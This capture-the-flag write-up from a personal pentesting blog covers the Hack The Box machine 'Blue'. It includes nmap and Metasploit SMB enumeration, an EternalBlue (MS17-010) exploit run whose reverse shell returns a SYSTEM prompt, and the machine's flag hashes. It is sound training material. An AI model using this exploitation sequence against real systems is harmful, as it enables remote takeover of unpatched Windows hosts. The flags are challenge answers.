30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Blue

6 years ago n0w4n

Introduction

The name of the server is Blue and it’s my second machine in the line of Hack the Box challenges.
This write-up is not public because of the restrictions given by the HTB team.
As for the machine, the level is easy.

Enumeration

Starting with a portscan.

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 10:31 CEST
Nmap scan report for 10.10.10.40
Host is up (0.042s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=9/25%OT=135%CT=1%CU=30145%PV=Y%DS=2%DC=T%G=Y%TM=59C8BF
OS:C1%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=I%TS=7)SEQ(SP=
OS:101%GCD=1%ISR=10B%TI=I%TS=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8
OS:NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2
OS:000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=
OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 0s, median: -1h00m00s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-25T08:35:07+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-09-25 09:35:08
|_  start_date: 2017-09-25 09:12:14
TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   25.85 ms  10.10.14.1
2   114.70 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.26 seconds
msf auxiliary(pipe_auditor) > run
[*] 10.10.10.40:445       - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_service, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(pipe_dcerpc_auditor) > run
Login Failed: The server refused our NetBIOS session request
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 18f70770-8e64-11cf-9af1-0020af6e72f4 0.0 OPEN VIA BROWSER
UUID 1ff70682-0a51-30e8-076d-740be8cee98b 1.0 OPEN VIA BROWSER
UUID 2eb08e3e-639f-4fba-97b1-14f878961076 1.0 OPEN VIA BROWSER
UUID 326731e3-c1c0-4a69-ae20-7d9044a4ea5c 1.0 OPEN VIA BROWSER
UUID 378e52b0-c0a9-11cf-822d-00aa0051e40f 1.0 OPEN VIA BROWSER
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 OPEN VIA BROWSER
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 86d35949-83c9-4044-b424-db363231fd0c 1.0 OPEN VIA BROWSER
UUID a398e520-d59a-4bdd-aa7a-3c1e0303a511 1.0 OPEN VIA BROWSER
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 1.0 OPEN VIA BROWSER
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumusers) > run
[+] 10.10.10.40:445       - HARIS-PC [  ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > run
[-] 10.10.10.40:139       - Login Failed: The SMB server did not reply to our request
[*] 10.10.10.40:445       - Windows 7 Service Pack 1 (Unknown)
[+] 10.10.10.40:445       - ADMIN$ - (DS) Remote Admin
[+] 10.10.10.40:445       - C$ - (DS) Default share
[+] 10.10.10.40:445       - IPC$ - (I) Remote IPC
[+] 10.10.10.40:445       - Share - (DS)
[+] 10.10.10.40:445       - Users - (DS)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) > run
[*] 10.10.10.40:445       - 10.10.10.40:445 - Starting SMB login bruteforce
[-] 10.10.10.40:445       - This system accepts authentication with any credentials, brute force is ineffective.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_lookupsid) > run
[*] 10.10.10.40:445       - PIPE(LSARPC) LOCAL(haris-PC - 5-21-319597671-3711062392-2889596693) DOMAIN(WORKGROUP - )
[*] 10.10.10.40:445       - USER=Administrator RID=500
[*] 10.10.10.40:445       - USER=Guest RID=501
[*] 10.10.10.40:445       - GROUP=None RID=513
[*] 10.10.10.40:445       - USER=haris RID=1000
[*] 10.10.10.40:445       - HARIS-PC [Administrator, Guest, haris ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 11:50 CEST
Nmap scan report for 10.10.10.40
Host is up (0.028s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds

Exploitation

Enough information gathering. Looks like the system is vulnerable.

msf exploit(ms17_010_eternalblue) > exploit -j
[*] Exploit running as background job 3.
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
msf exploit(ms17_010_eternalblue) > [+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.40:49158) at 2017-09-25 11:55:18 +0200
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\haris\Desktop>type user.txt.txt
type user.txt.txt
4c546aea7dbee75cbd71de245c8deea9

That’s one. No to get the final hash.

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
ff548eb71e920ff6c08843ce9df4e717

Done.
 

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.